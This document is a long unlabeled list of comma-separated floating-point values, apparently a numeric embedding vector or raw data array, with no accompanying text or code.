0.0061983391642570496, 0.03081497550010681, -0.021520739421248436, 0.029296480119228363, -0.047989677637815475, 0.01189924031496048, 0.03647005930542946, -0.005340913310647011, -0.0017884859116747975, -0.018771739676594734, 0.008410628885030746, -0.0020110239274799824, -0.015250401571393013, 0.009484048001468182, 0.0030991695821285248, 0.020368777215480804, 0.026351124048233032, 0.020473500713706017, -0.010446198284626007, -0.018797921016812325, 0.0072324867360293865, -0.010210569016635418, 0.014726783148944378, 0.025343157351017, -0.016454724594950676, 0.008076822385191917, -0.011054905131459236, 0.025133710354566574, 0.046837713569402695, -0.004218405112624168, -0.01833975315093994, -0.012089052237570286, -0.0004129635344725102, 0.03722930699586868, 0.01405916828662157, 0.006031435914337635, -0.004205314442515373, -0.005318005103617907, 0.008600440807640553, 0.015158768743276596, 0.008155365474522114, 0.005232916679233313, -0.032516736537218094, 0.004742024000734091, 0.00350497430190444, 0.032124023884534836, 0.03120769001543522, 0.006469966843724251, 0.02095784805715084, 0.008260088972747326, -0.013470097444951534, -0.0009294236078858376, -0.021468376740813255, -0.01861465349793434, 0.0059561654925346375, 0.011349440552294254, 0.0099160335958004, 0.0005252552800811827, 0.01746269129216671, 0.0256180576980114, 0.021389834582805634, 0.011768335476517677, -0.002202472183853388, -0.008194636553525925, -0.020093876868486404, -0.008286269381642342, -0.039978306740522385, -0.03429704159498215, 0.0005927530000917614, -0.013326101936399937, 0.0011904150014743209, 0.0020192055962979794, -0.02481953799724579, -0.013535549864172935, -0.009745857678353786, 0.02429591864347458, -0.023418856784701347, 0.02971537597477436, 0.0019504806259647012, -0.01036765519529581, -0.018379025161266327, 0.006600871216505766, 0.028772860765457153, 0.054822903126478195, 0.0007977007189765573, 0.00676122959703207, 0.0009245147230103612, 0.038957249373197556, -0.023733029142022133, -0.008711710572242737, -0.002865177346393466, 0.0385645367205143, 0.012049781158566475, -0.007225941400974989, 0.019125182181596756, 0.009052062407135963, 0.01594419777393341, 0.013758087530732155, -0.0023251953534781933, -0.02500280551612377, 0.018169578164815903, 0.022515615448355675, 0.009497138671576977, 0.004051501397043467, -0.0016903073992580175, 0.02869431860744953, 0.012926843017339706, -0.0027719077188521624, -0.004424579907208681, 0.008757526986300945, -0.03461121395230293, 0.0040940456092357635, -0.0032120749820023775, -0.007036129478365183, 0.015747839584946632, 0.04673299193382263, -0.0018064853502437472, 0.02233234792947769, 0.020617496222257614, 0.0016592175234109163, -0.02432209998369217, -0.009287690743803978, -0.02294760011136532, -0.010930545628070831, 0.00410386361181736, -0.020866215229034424, 0.0009670587605796754, 0.028170699253678322, -0.003691513556987047, -0.003789692185819149, -0.021088752895593643, 0.001729578827507794, 0.02269888110458851, 0.00022540159989148378, 0.026783108711242676, -0.016624901443719864, -0.016297640278935432, 0.03406141325831413, -0.03183603286743164, 0.03118150867521763, -0.010020758025348186, -0.027437632903456688, 0.01167670264840126, -0.002348103793337941, 0.02437446266412735, -0.0067023225128650665, -0.012429405003786087, -0.02048659138381481, -0.026678385213017464, -0.0035344278439879417, 0.012992295436561108, -0.011513072066009045, -0.017593596130609512, 0.006469966843724251, 0.02335340529680252, -0.014163892716169357, 0.0031024422496557236, 0.016035830602049828, -0.021088752895593643, 0.012887571007013321, -0.016101282089948654, -0.011859969235956669, -0.0043394919484853745, -0.0023301043547689915, 0.004712570458650589, 0.018797921016812325, 0.015747839584946632, 0.02801361307501793, 0.023746119812130928, 0.034192316234111786, -0.03979504108428955, -0.0020961121190339327, 0.004457306116819382, -0.003095896914601326, 0.003671877784654498, 0.008554624393582344, -0.003403523238375783, -0.007978643290698528, 0.005448909476399422, 0.023091595619916916, 0.0036162433680146933, -0.02192654274404049, 0.012278864160180092, 0.022515615448355675, 0.015813292935490608, -0.00014266571088228375, 0.018693195655941963, -0.01147380005568266, -0.005023469217121601, 0.018693195655941963, 0.0026966375298798084, 0.031940754503011703, -0.04149680212140083, -0.005517634563148022, -0.04199424013495445, -0.01181415282189846, 0.011879605241119862, 0.0020699312444776297, -0.0002135383547283709, 0.013267194852232933, 0.01619291678071022, -0.006394696421921253, 0.01354864053428173, -0.010531285777688026, 0.0013475005980581045, 0.01746269129216671, -0.00024544636835344136, -0.001862119883298874, 0.007468115072697401, 0.012638852000236511, 0.007441934198141098, 0.008750981651246548, -0.02484571933746338, 0.014805325306952, -0.007389572449028492, -0.006708867847919464, -0.011840333230793476, -0.039925944060087204, 0.013254104182124138, -0.04971762001514435, -0.012252683751285076, -0.018549202010035515, 0.012180685997009277, -0.012665033340454102, -0.0011225080816075206, 0.0036293338052928448, 0.0040678647346794605, -0.007330665364861488, -0.007265212945640087, -0.002834087470546365, -0.018745558336377144, -0.005501271691173315, 0.003982776775956154, 0.006453603506088257, 0.026233309879899025, -0.0031106239184737206, -0.02921793796122074, -0.016978343948721886, -0.0002335831377422437, -0.02247634343802929, -0.010171297937631607, -0.011958147399127483, -0.0180386733263731, 0.005462000146508217, 0.028301604092121124, 0.005929984617978334, -0.011598159559071064, 0.018549202010035515, -0.006591053679585457, -0.03128623217344284, 0.014176983386278152, -0.005605995189398527, -0.0033380708191543818, 0.013319556601345539, 0.01699143461883068, 0.028929946944117546, 0.000717521586921066, 0.02173018641769886, 0.002968264976516366, -0.009935669600963593, -0.033694878220558167, 0.02639039419591427, -0.00714739877730608, 0.02150764875113964, -0.030945880338549614, -0.025028984993696213, -0.004002412315458059, 0.0007629291503690183, 0.014883868396282196, 0.011630886234343052, 0.009719676338136196, -0.006237610708922148, 0.010204024612903595, 0.011316714808344841, 0.009287690743803978, -0.018928825855255127, -0.01007966510951519, -0.006424149964004755, -0.010099300183355808, 0.008175000548362732, 0.028746679425239563, -0.0027310000732541084, 0.03118150867521763, 0.017331786453723907, 0.025657327845692635, 0.024583909660577774, -0.014752963557839394, -0.005583086982369423, -0.0008459718665108085, 0.002714636968448758, 0.005527452565729618, 0.010760369710624218, -0.02255488559603691, -0.02649511955678463, 0.029924822971224785, 0.0009294236078858376, -0.01309701893478632, 0.007801922503858805, -0.007860829122364521, 0.00041869061533361673, 0.01988442987203598, -0.017344877123832703, -0.00845644623041153, -0.010472378693521023, -0.022541794925928116, -0.0025493698194622993, 0.006217975169420242, 0.0070950365625321865, 0.022541794925928116, -0.004388581495732069, 0.008980064652860165, -0.008999700658023357, -0.03764820098876953, -0.014491154812276363, -0.01768523082137108, 0.012219957076013088, -0.0007072946755215526, -0.02470172382891178, 0.0001605628349352628, -0.004244585987180471, 0.002228653058409691, -0.011886149644851685, -0.023589033633470535, -0.010629464872181416, -0.014098440296947956, -0.028301604092121124, 0.014412611722946167, 0.025028984993696213, 0.005857986863702536, 0.016572538763284683, -0.005226371809840202, -0.05356621742248535, -0.00541291106492281, -0.0039467778988182545, 0.014870777726173401, -0.00138922652695328, -0.011094176210463047, -0.021625462919473648, 0.001461224164813757, -0.005295096430927515, 0.012920297682285309, 0.011709428392350674, 0.005497999023646116, 0.011120357550680637, 0.003040262497961521, 0.0030533529352396727, 0.042674943804740906, 0.00009357643284602091, 0.005540542770177126, 0.013967535458505154, 0.010099300183355808, -0.021913452073931694, -0.005818715784698725, 0.01806485280394554, 0.013993716798722744, -0.014779144898056984, 0.010295657441020012, 0.008665893226861954, 0.008914612233638763, -0.015014773234724998, -0.005151101388037205, 0.03379960358142853, 0.007023039273917675, -0.008862250484526157, 0.0034166136756539345, 0.017449600622057915, 0.005514361895620823, 0.002014296595007181, -0.023039232939481735, -0.01589183509349823, 0.0026017315685749054, -0.032490555197000504, -0.012881025671958923, 0.0050071063451468945, 0.015211130492389202, -0.005671447608619928, -0.024466095492243767, 0.014176983386278152, -0.008188091218471527, 0.021219657734036446, -0.030396079644560814, 0.012881025671958923, 0.00994221493601799, 0.004997288342565298, 0.04448143020272255, 0.02305232360959053, 0.0012779574608430266, -0.005785989575088024, 0.008652803488075733, 0.004967834800481796, 0.01178797148168087, -0.0009907851926982403, -0.006149250082671642, 0.0034362494479864836, 0.01082582212984562, -0.009300781413912773, -0.0004072364536114037, 0.00467657158151269, -0.0014424065593630075, 0.008462991565465927, 0.008266634307801723, -0.013902083039283752, -0.02175636775791645, 0.013915173709392548, -0.01405916828662157, -0.010406926274299622, 0.012966114096343517, -0.005566724110394716, 0.002308832248672843, 0.020866215229034424, 0.008502262644469738, -0.005448909476399422, -0.00047943860408850014, 0.012920297682285309, -0.03068407066166401, 0.03296181187033653, -0.016546359285712242, 0.008966974914073944, 0.018667016178369522, -0.010773459449410439, 0.0034133410081267357, 0.009189512580633163, -0.023863933980464935, 0.014072258956730366, 0.007991733960807323, 0.020866215229034424, -0.02005460485816002, -0.008161909878253937, -0.004454033449292183, -0.0038780528120696545, 0.004578392952680588, -0.0018588472157716751, 0.014451882801949978, 0.01510640699416399, 0.030003365129232407, 0.012606126256287098, 0.012933388352394104, 0.00976549368351698, 0.040083032101392746, 0.010668735951185226, 0.0040155029855668545, -0.005340913310647011, 0.013627182692289352, -0.004012230318039656, -0.0022384710609912872, -0.008816434070467949, 0.014098440296947956, -0.008574260398745537, 0.006041253451257944, 0.011552343145012856, 0.037857651710510254, 0.00829281471669674, 0.006237610708922148, -0.011624340899288654, -0.006774320267140865, 0.025526423007249832, -0.02437446266412735, 0.0014964047586545348, -0.0016084919916465878, -0.0038224183954298496, 0.01115308329463005, 0.020656768232584, -0.010832366533577442, 0.014190073125064373, -0.00431658374145627, 0.011663611978292465, 0.007363391574472189, 0.011022178456187248, -0.0051020123064517975, -0.004208587110042572, -0.0026017315685749054, -0.010262931697070599, -0.0037995099555701017, -0.007252122275531292, 0.009569136425852776, -0.00036101072328165174, -0.005975801032036543, 0.001691943733021617, -0.005121647845953703, -0.007409207988530397, -0.018248120322823524, -0.012344316579401493, -0.0004810749087482691, -0.004251131322234869, 0.009287690743803978, -0.008135729469358921, -0.007716834079474211, 0.01323446910828352, 0.0021288383286446333, -0.00036816956708207726, -0.004008957650512457, 0.02619403786957264, -0.02110184356570244, 0.0174888726323843, -0.002963355975225568, -0.0055634514428675175, -0.0049383812583982944, -0.011722519062459469, -0.0027130006346851587, -0.004552212078124285, -0.04202042147517204, -0.005484908353537321, 0.026809290051460266, -0.007029584143310785, -0.011022178456187248, -0.009274601005017757, -0.021245839074254036, -0.00530818710103631, -0.005867804866284132, -0.025382429361343384, -0.008672438561916351, -0.02756853774189949, -0.001550402957946062, 0.01061637420207262, -0.009038971737027168, 0.01189924031496048, 0.009739312343299389, -0.007212851196527481, -0.004974380135536194, -0.004244585987180471, 0.012377043254673481, 0.019897520542144775, -0.013915173709392548, 0.010544376447796822, 0.00520673580467701, -0.02282978594303131, 0.01055092178285122, 0.005501271691173315, 0.010995998047292233, 0.0026704566553235054, 0.004647118039429188, 0.003305344609543681, -0.000020824591047130525, 0.02252870611846447, -0.003959868103265762, -0.00019932290888391435, -0.01485768798738718, -0.0195571668446064, -0.016297640278935432, -0.0033707970287650824, -0.004984197672456503, -0.036836594343185425, -0.010420016944408417, 0.02178254909813404, 0.007481205742806196, 0.005740172695368528, 0.012540673837065697, -0.008934248238801956, -0.010132026858627796, -0.01050510536879301, -0.014032987877726555, 0.00910442415624857, 0.01608819141983986, -0.01510640699416399, 0.007867374457418919, 0.008194636553525925, -0.00729139382019639, 0.0022499251645058393, 0.021664733067154884, 0.04882746562361717, 0.01900736801326275, -0.010073119774460793, -0.0009171513374894857, 0.014726783148944378, -0.008868795819580555, -0.0004246222379151732, 0.011729064397513866, 0.007723379414528608, 0.007337210699915886, 0.004722388461232185, 0.02093166671693325, 0.008063731715083122, -0.027411451563239098, 0.015067134983837605, -0.002997718518599868, -0.007422298658639193, -0.0100534837692976, 0.0026017315685749054, -0.0014276797883212566, 0.020290235057473183, 0.002775180386379361, 0.006846317555755377, -0.011702883057296276, 0.006820136681199074, 0.011467254720628262, 0.012481766752898693, -0.009863671846687794, -0.0030451714992523193, 0.0301604513078928, 0.0057532633654773235, 0.006011799909174442, -0.0014947684248909354, -0.0060085272416472435, 0.007468115072697401, -0.009739312343299389, 0.0011781426146626472, -0.00006877612031530589, -0.007513931952416897, 0.0016134008765220642, 0.005458727478981018, 0.005429273936897516, -0.001790122245438397, -0.004804203752428293, 0.001835938892327249, 0.022659609094262123, -0.008423719555139542, 0.0008083367720246315, -0.005831805989146233, -0.018824100494384766, -0.007985188625752926, -0.01826121099293232, -0.002207381185144186, 0.010177843272686005, 0.0153551260009408, 0.003459157655015588, 0.015289673581719398, 0.016533268615603447, 0.014569696970283985, 0.007913191802799702, 0.01082582212984562, 0.00010871229460462928, 0.018051763996481895, 0.0004970289301127195, -0.004722388461232185, 0.03450648859143257, -0.0016174917109310627, 0.022410890087485313, 0.0051281931810081005, 0.012501402758061886, -0.010969816707074642, -0.008279724977910519, -0.020120058208703995, -0.007284848485141993, 0.011886149644851685, -0.009222238324582577, -0.00941859558224678, 0.003701331326738, 0.01235086191445589, -0.007723379414528608, 0.011663611978292465, 0.0037700564134866, -0.000639796897303313, -0.019504806026816368, 0.01138871256262064, -0.0066597783006727695, 0.016271458938717842, -0.0017803044756874442, 0.004850020632147789, -0.023209409788250923, -0.0125341285020113, 0.030526984483003616, 0.005370366852730513, -0.008613531477749348, -0.000659841694869101, -0.008489171974360943, -0.010799640789628029, 0.0049383812583982944, -0.0024135559797286987, 0.014766054227948189, 0.010655645281076431, -0.0008893340709619224, -0.01583947241306305, 0.006911769974976778, 0.01206287182867527, -0.004077682737261057, 0.006879043765366077, 0.006666323635727167, 0.018771739676594734, 0.002048659138381481, -0.0032431648578494787, -0.01156543381512165, 0.017632868140935898, -0.016520177945494652, -0.02203126810491085, 0.023733029142022133, 0.0024479185231029987, -0.01649399660527706, -0.003655514679849148, -0.0061296140775084496, 0.007134308107197285, -0.02404719963669777, 0.0003595789603423327, 0.0038682350423187017, 0.028301604092121124, 0.019779706373810768, 0.01828739233314991, -0.006247428711503744, -0.000022205227651284076, -0.0051969182677567005, 0.018797921016812325, -0.018405206501483917, -0.00513801071792841, 0.0077102892100811005, 0.021389834582805634, 0.0040155029855668545, 0.006787410471588373, -0.004182406235486269, -0.012678124010562897, 0.006872498895972967, -0.014425702393054962, 0.025814414024353027, -0.026508208364248276, 0.013758087530732155, -0.0019242996349930763, 0.019046640023589134, 0.00924187432974577, 0.004362400155514479, -0.007939372211694717, 0.014360249973833561, 0.007991733960807323, 0.0008770617423579097, -0.0050071063451468945, 0.021861091256141663, 0.02032950520515442, 0.006100160535424948, -0.009340053424239159, 0.002902812557294965, 0.025356248021125793, 0.019674982875585556, 0.0019112091977149248, -0.01505404431372881, -0.02095784805715084, -0.02646893821656704, -0.006604143884032965, -0.013195197097957134, 0.00294044753536582, -0.017659049481153488, 0.017567414790391922, -0.021350562572479248, 0.01938699185848236, -0.014988592825829983, -0.0024740996304899454, 0.017253244295716286, 0.009012791328132153, 0.005818715784698725, -0.00768410786986351, 0.014962411485612392, -0.008620076812803745, -0.0021599282044917345, 0.014569696970283985, 0.017423421144485474, 0.02322250045835972, -0.01663799211382866, -0.01206287182867527, 0.007697198539972305, -0.01207596156746149, -0.0014538607792928815, 0.019216815009713173, -0.009608407504856586, 0.007494296412914991, 0.0037340575363487005, 0.0026360941119492054, 0.001695216284133494, -0.000599298276938498, -0.015774020925164223, -0.020774582400918007, 0.022842876613140106, 0.01030220277607441, 0.01337191928178072, -0.0124621307477355, 0.012226502411067486, 0.013188652694225311, -0.018745558336377144, -0.0016387637006118894, 0.009700041264295578, -0.02467554248869419, 0.012619216926395893, 0.022842876613140106, 0.002199199516326189, -0.01206287182867527, -0.005134738516062498, -0.002793179824948311, 0.014975502155721188, 0.014517335221171379, -0.014098440296947956, 0.019871339201927185, 0.006037980783730745, -0.007284848485141993, -0.009621498174965382, 0.010557467117905617, -0.014648240059614182, 0.011270897462964058, -0.0039042336866259575, -0.019504806026816368, 0.0016117645427584648, -0.006911769974976778, -0.00676122959703207, 0.0029568106401711702, 0.0009433322702534497, 0.014098440296947956, -0.01165052130818367, -0.009385869838297367, 0.008620076812803745, -0.021874181926250458, 0.002783362055197358, 0.016009649261832237, -0.006195066496729851, -0.007500841282308102, -0.013149380683898926, 0.008299360051751137, -0.007926281541585922, 0.0018408478936180472, -0.01089127454906702, -0.007926281541585922, 0.004123499151319265, 0.0100534837692976, -0.00442130770534277, 0.016428545117378235, 0.01856229081749916, -0.013875901699066162, -0.0053998203948140144, 0.011964692734181881, 0.006708867847919464, 0.03958559408783913, 0.021638553589582443, -0.010910909622907639, -0.00357369938865304, -0.0009834218071773648, 0.007985188625752926, -0.0026442757807672024, -0.013064293190836906, -0.022122900933027267, -0.003645696910098195, -0.017096158117055893, -0.010708007030189037, 0.005396547727286816, 0.002819360699504614, 0.009870217181742191, -0.00983094610273838, -0.0004880292108282447, -0.015538392588496208, -0.009058607742190361, 0.01201050914824009, -0.0009875126415863633, 0.015931107103824615, -0.0009924215264618397, -0.02005460485816002, -0.00284717814065516, -0.018025582656264305, -0.027123460546135902, 0.00583835132420063, 0.0011503254063427448, -0.00027919525746256113, -0.027202004566788673, 0.023340314626693726, -0.015093316324055195, 0.015708567574620247, 0.0077626509591937065, 0.021546918898820877, -0.013365373946726322, -0.01163743156939745, -0.024086471647024155, 0.011323260143399239, -0.007566293701529503, -0.02063058689236641, -0.014700601808726788, 0.0227250624448061, -0.00048639290616847575, -0.0017590323695912957, -0.015931107103824615, -0.014412611722946167, 0.023392677307128906, -0.002570641692727804, 0.01377117820084095, 0.010354564525187016, 0.011742155067622662, -0.0034624303225427866, -0.0001676194224273786, 0.015171859413385391, 0.00080997304758057, -0.0038813254795968533, -0.029532108455896378, 0.021520739421248436, 0.0005473454366438091, 0.007219396065920591, -0.011526161804795265, 0.012769756838679314, 0.003403523238375783, -0.009680405259132385, -0.018169578164815903, 0.012305045500397682, -0.008168455213308334, -0.015525301918387413, -0.039402324706315994, 0.01455660630017519, 0.008364812470972538, 0.015656206756830215, -0.02674383856356144, 0.004925290588289499, 0.015983467921614647, -0.00029617195832543075, -0.03427086025476456, 0.0024544638581573963, 0.00885570514947176, 0.0004017139144707471, 0.009837491437792778, -0.009902942925691605, -0.0035147920716553926, 0.003354433923959732, 0.003020626725628972, 0.0013434098800644279, 0.0023759210016578436, 0.004332946613430977, 0.015813292935490608, -0.014648240059614182, 0.004382036160677671, -0.0034820660948753357, -0.0012779574608430266, -0.02517298050224781, 0.013731907121837139, 0.006489602383226156, 0.03809328004717827, -0.004918745718896389, -0.0010120572987943888, -0.011486890725791454, -0.017528144642710686, 0.038407448679208755, 0.010328384116292, -0.008476081304252148, 0.010465833358466625, -0.0009776947554200888, 0.0018113943515345454, 0.006316153332591057, -0.012913752347230911, -0.0052492800168693066, 0.011892694979906082, -0.02095784805715084, 0.009634588845074177, 0.014805325306952, -0.010498560033738613, 0.004509668331593275, 0.003264436963945627, 0.019465534016489983, 0.01068837195634842, -0.0023301043547689915, -0.03599880263209343, -0.022921418771147728, 0.0005555269890464842, 0.010799640789628029, -0.02032950520515442, -0.011297078803181648, 0.006371788214892149, -0.00006841817958047614, -0.020316414535045624, -0.026207128539681435, 0.017868496477603912, 0.013227923773229122, 0.026180947199463844, -0.017907768487930298, 0.0025068256072700024, 0.0030026272870600224, 0.028249241411685944, -0.018182668834924698, -0.010197479277849197, -0.01693907380104065, -0.015027863904833794, 0.008279724977910519, -0.002997718518599868, 0.0037471482064574957, -0.006551782134920359, 0.007527022156864405, 0.0016682172426953912, -0.01404607854783535, 0.02288214862346649, -0.010819276794791222, 0.007618655916303396, -0.01691289246082306, 0.008548079058527946, -0.0020502954721450806, -0.022410890087485313, 0.00863316748291254, 0.0017819406930357218, -0.003288981504738331, -0.004653663374483585, 0.015774020925164223, -0.01963571086525917, -0.01696525327861309, -0.010858547873795033, -0.0251991618424654, -0.0016134008765220642, -0.006793955806642771, 0.010334928520023823, 0.0001703806919977069, 0.024754086509346962, -0.0025035531725734472, 0.004234768450260162, 0.007160488981753588, 0.02324868179857731, 0.020120058208703995, -0.00048434751806780696, 0.00488274684175849, 0.009595316834747791, -0.017973219975829124, -0.00178684969432652, -0.002596822800114751, -0.004774750210344791, -0.004326401744037867, -0.022410890087485313, -0.004611119162291288, 0.004260949324816465, -0.012193776667118073, -0.012972659431397915, 0.008142274804413319, 0.003130259457975626, -0.004346037283539772, -0.00829281471669674, -0.0049907430075109005, 0.0029911731835454702, 0.015407487750053406, -0.00018633471336215734, 0.02801361307501793, -0.019400082528591156, 0.006011799909174442, -0.02335340529680252, -0.009196057915687561, -0.007965553551912308, 0.008031005971133709, 0.01704379729926586, 0.0028864494524896145, -0.045999925583601, -0.0077102892100811005, -0.012979204766452312, 0.0057794442400336266, 0.0076775630004704, -0.0015315854689106345, -0.019125182181596756, -0.004706025123596191, 0.00588089507073164, -0.021848000586032867, 0.015171859413385391, -0.015237311832606792, 0.010531285777688026, -0.00913060549646616, -0.01458278764039278, -0.007225941400974989, 0.04592138156294823, 0.0014808598207309842, 0.022188352420926094, 0.012802483513951302, -0.005380184855312109, 0.01221341174095869, -0.007880465127527714, 0.001207596156746149, -0.00442785257473588, 0.0035638813860714436, -0.01633691042661667, -0.02192654274404049, 0.012789392843842506, -0.005962710827589035, -0.0040155029855668545, 0.005190372932702303, -0.01771141029894352, -0.011303624138236046, 0.00583835132420063, -0.019190633669495583, 0.029322661459445953, 0.010747279040515423, -0.019400082528591156, 0.03814563900232315, 0.0022090175189077854, -0.00438530882820487, -0.0028979035560041666, 0.0023104685824364424, 0.00838444847613573, 0.005756536033004522, 0.01041347160935402, -0.0016354910330846906, 0.022044356912374496, 0.0048892917111516, 0.00017426692647859454, -0.0057107191532850266, -0.009372779168188572, -0.023458128795027733, -0.012540673837065697, -0.004627482499927282, 0.03819800168275833, 0.010956726036965847, -0.0039205970242619514, -0.009006245993077755, -0.007500841282308102, 0.004470396786928177, 0.026010770350694656, -0.034637391567230225, 0.014622058719396591, -0.012089052237570286, -0.0025313703808933496, 0.010701462626457214, -0.015250401571393013, 0.0048271119594573975, -0.00944477692246437, -0.0054783630184829235, -0.02073531039059162, -0.011532707139849663, 0.011696338653564453, -0.005298369098454714, -0.008279724977910519, -0.032045479863882065, 0.000807109521701932, -0.011598159559071064, 0.005596177652478218, -0.01082582212984562, 0.023471219465136528, 0.030919698998332024, -0.019203724339604378, 0.006977222394198179, 0.017894677817821503, -0.01561693474650383, 0.02297378145158291, -0.010544376447796822, 0.007376481778919697, -0.003887870581820607, 0.012265773490071297, -0.000053589126764563844, -0.00307789770886302, 0.0036096980329602957, -0.006371788214892149, -0.00689867977052927, -0.004755114670842886, -0.018221938982605934, -0.008377903141081333, 0.014190073125064373, 0.0025166436098515987, -0.000014343272596306633, 0.010583647526800632, 0.011990874074399471, -0.0006238428759388626, 0.030526984483003616, -0.0049220179207623005, 0.024256648495793343, 0.013038111850619316, 0.00689867977052927, 0.0022171989548951387, -0.001729578827507794, 0.001449769944883883, -0.008868795819580555, 0.0035377005115151405, -0.0024790083989501, 0.003032081061974168, 0.019818976521492004, -0.005759808234870434, -0.012638852000236511, -0.014936230145394802, 0.0030009911861270666, -0.015001682564616203, -0.004951471462845802, 0.010943636298179626, 0.01633691042661667, 0.007828103378415108, -0.0018457567784935236, -0.018575381487607956, 0.008731345646083355, 0.029008489102125168, -0.005373639520257711, 0.0038060552906244993, -0.02070912905037403, 0.000010060744898510166, 0.007507386617362499, -0.011768335476517677, 0.0037536933086812496, -0.01485768798738718, 0.007160488981753588, 0.02619403786957264, -0.004054774064570665, 0.006754684261977673, -0.0010218750685453415, -0.011820698156952858, 0.016873620450496674, -0.00003651014776551165, -0.01027602143585682, 0.015407487750053406, 0.009497138671576977, 0.009660769253969193, 0.015813292935490608, -0.01898118667304516, -0.006505965255200863, 0.015014773234724998, 0.009523320011794567, -0.010963271372020245, 0.019845157861709595, -0.03615588694810867, 0.024583909660577774, 0.007343755569308996, 0.027280546724796295, -0.013902083039283752, -0.0007432934362441301, -0.005959438160061836, 0.0006013436359353364, 0.022044356912374496, -0.008914612233638763, 0.008220817893743515, 0.008194636553525925, 0.011434528976678848, 0.014883868396282196, -0.005115102510899305, -0.02390320412814617, 0.021193476393818855, 0.012200321070849895, 0.002919175662100315, 0.01401989720761776, -0.00548818102106452, -0.022541794925928116, 0.020120058208703995, -0.0054947263561189175, -0.004149680025875568, 0.022358529269695282, 0.019688071683049202, -0.00025730961351655424, 0.015093316324055195, 0.03068407066166401, 0.014648240059614182, 0.016729624941945076, 0.005367094185203314, -0.006669596303254366, -0.023510491475462914, -0.00007925873069325462, -0.00980476476252079, -0.005730354692786932, -0.00835826713591814, -0.0032775274012237787, -0.010007667355239391, -0.015446758829057217, 0.0011650521773844957, 0.005730354692786932, 0.011231626383960247, 0.004493304993957281, -0.006168885622173548, -0.007664472330361605, 0.013090473599731922, -0.019478624686598778, 0.009372779168188572, 0.0017410330474376678, 0.0060936156660318375, 0.007219396065920591, -0.0002159928117180243, 0.0023301043547689915, -0.009621498174965382, 0.03073643147945404, -0.0015430395724251866, -0.011421438306570053, -0.004257676657289267, -0.019373901188373566, -0.008790252730250359, 0.004817294422537088, -0.013129744678735733, 0.017528144642710686, -0.0012485039187595248, -0.00463402783498168, -0.01426861621439457, 0.020067695528268814, -0.00003106430813204497, 0.000913878669962287, 0.004018775653094053, -0.0026851834263652563, 0.0013990444131195545, -0.0023710120003670454, -0.00417913356795907, -0.020866215229034424, 0.014150802046060562, 0.009457867592573166, -0.015420578420162201, 0.020617496222257614, -0.011048359796404839, 0.004526031203567982, -0.0028062702622264624, 0.007239032071083784, 0.001971752615645528, -0.007854283787310123, 0.017698319628834724, -0.005592904984951019, -0.0003959868336096406, 0.013110109604895115, 0.013731907121837139, -0.030317537486553192, 0.01633691042661667, -0.011990874074399471, -0.008692074567079544, -0.014661330729722977, 0.02125892974436283, -0.00004349003211245872, -0.003766783745959401, -0.0123246805742383, -0.026259489357471466, -0.0073699369095265865, 0.004202042240649462, -0.0034624303225427866, -0.011270897462964058, 0.011048359796404839, 0.010832366533577442, 0.008502262644469738, -0.015721658244729042, 0.027332909405231476, -0.011211990378797054, -0.013679545372724533, 0.004362400155514479, -0.004336219280958176, 0.0017066705040633678, 0.002919175662100315, -0.014176983386278152, -0.0029355387669056654, -0.002783362055197358, 0.01938699185848236, 0.016873620450496674, 0.005259098019450903, -0.04675917327404022, -0.026756927371025085, -0.000029018921850365587, -0.005393275059759617, 0.006594326347112656, 0.012475221417844296, -0.008155365474522114, -0.011873059906065464, 0.005893985740840435, 0.0014775872696191072, 0.005190372932702303, 0.012396678328514099, 0.003796237288042903, -0.008502262644469738, 0.009588772431015968, -0.015093316324055195, 0.02043422870337963, 0.017475781962275505, -0.01883719116449356, 0.029244117438793182, 0.007474660407751799, -0.0007747923955321312, 0.027437632903456688, -0.0028602685779333115, 0.023916294798254967, -0.004264221992343664, -0.02385084331035614, -0.012867935933172703, -0.010910909622907639, -0.02310468629002571, 0.019792797043919563, -0.021769458428025246, -0.015014773234724998, 0.021416014060378075, 0.01192542165517807, -0.00689867977052927, 0.006217975169420242, 0.0037275124341249466, 0.008364812470972538, 0.0070950365625321865, 0.009385869838297367, -0.03605116531252861, -0.0024740996304899454, -0.0024135559797286987, -0.000018715287296799943, 0.0034460672177374363, -0.014648240059614182, 0.03722930699586868, 0.015630025416612625, 0.03343306854367256, -0.0015029499772936106, -0.02440064214169979, -0.0035900624934583902, 0.02288214862346649, -0.0062834275886416435, -0.003400250570848584, 0.0006647506379522383, 0.012468676082789898, -0.005579814314842224, 0.0017263061599805951, 0.03458503261208534, 0.0072063058614730835, 0.005596177652478218, -0.018326662480831146, 0.008011369965970516, 0.017855405807495117, -0.010858547873795033, -0.004679844249039888, -0.01820884831249714, -0.007474660407751799, -0.0005076649249531329, -0.025801323354244232, 0.014373339712619781, -0.02046041004359722, -0.01960952952504158, 0.002960083307698369, -0.016048921272158623, -0.011696338653564453, -0.0033249803818762302, -0.017855405807495117, 0.004228223115205765, -0.015734748914837837, -0.006001982372254133, -0.0070164939388632774, 0.00899315532296896, 0.006492875050753355, -0.028903765603899956, -0.018523020669817924, 0.005079103633761406, -0.012435950338840485, -0.008116093464195728, -0.0036129707004874945, -0.007474660407751799, 0.02280360460281372, -0.026914013549685478, -0.004764932207763195, 0.021913452073931694, -0.0033298891503363848, -0.00795900821685791, 0.0014374976744875312, -0.0051543740555644035, 0.011729064397513866, -0.015931107103824615, 0.008908066898584366, -0.01608819141983986, 0.0002986264298669994, 0.025853686034679413, 0.006937950849533081, 0.019400082528591156, -0.0054783630184829235, 0.006469966843724251, 0.005174009595066309, 0.003455884987488389, -0.002433191752061248, -0.007664472330361605, 0.008135729469358921, -0.0018179395701736212, -0.006126341875642538, 0.01307083759456873, 0.001409680349752307, -0.0024348280858248472, 0.012403223663568497, 0.0070950365625321865, 0.0021632008720189333, -0.0070950365625321865, 0.012298500165343285, 0.005988891702145338, -0.010596738196909428, 0.01156543381512165, -0.015721658244729042, 0.009012791328132153, -0.0015111315296962857, -0.01833975315093994, -0.0061721582897007465, -0.021167295053601265, -0.02125892974436283, 0.005347458645701408, -0.00742884399369359, 0.03345924988389015, -0.03173130750656128, -0.002904448891058564, 0.0024888264015316963, -0.02963683195412159, 0.0005915258079767227, -0.007500841282308102, -0.010956726036965847, -0.010511650703847408, 0.008816434070467949, -0.009477502666413784, 0.020146239548921585, -0.002241743728518486, 0.008875341154634953, 0.013332647271454334, 0.020525863394141197, -0.012396678328514099, -0.01936081051826477, 0.0050071063451468945, 0.010780004784464836, -0.0022842877078801394, -0.035867899656295776, -0.006312881130725145, -0.0013245922746136785, 0.0022777423728257418, -0.010171297937631607, -0.011886149644851685, 0.0025477334856987, 0.004018775653094053, -0.00818154588341713, -0.008188091218471527, -0.018968096002936363, 